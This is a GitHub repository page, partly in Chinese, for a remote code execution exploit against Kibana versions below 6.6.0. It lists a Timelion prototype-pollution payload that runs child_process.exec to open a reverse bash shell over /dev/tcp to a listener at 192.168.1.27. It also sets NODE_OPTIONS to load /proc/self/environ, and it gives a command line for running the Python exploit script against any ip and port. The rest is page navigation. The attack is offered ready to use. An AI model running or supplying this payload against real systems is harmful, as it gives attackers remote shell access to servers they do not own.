kibana-RCE <6.6.0

监听端口

POC：

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.27/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

执行POC

成功反弹shell

脚本使用

python kibana6.6.0RCE.py http://ip:port RHOST RPORT

参考链接

https://github.com/jas502n/kibana-RCE

Name		Name	Last commit message	Last commit date
Latest commit History 22 Commits
README.md		README.md
kibana1.jpg		kibana1.jpg
kibana3.png		kibana3.png
kibana6.6.0RCE.py		kibana6.6.0RCE.py
kibana_2.jpg		kibana_2.jpg
rce.jpg		rce.jpg

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

kibana-RCE <6.6.0

脚本使用

参考链接

About

Releases

Packages

Languages

GG-o1/kibana-RCE

Folders and files

Latest commit

History

Repository files navigation

kibana-RCE <6.6.0

脚本使用

参考链接

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages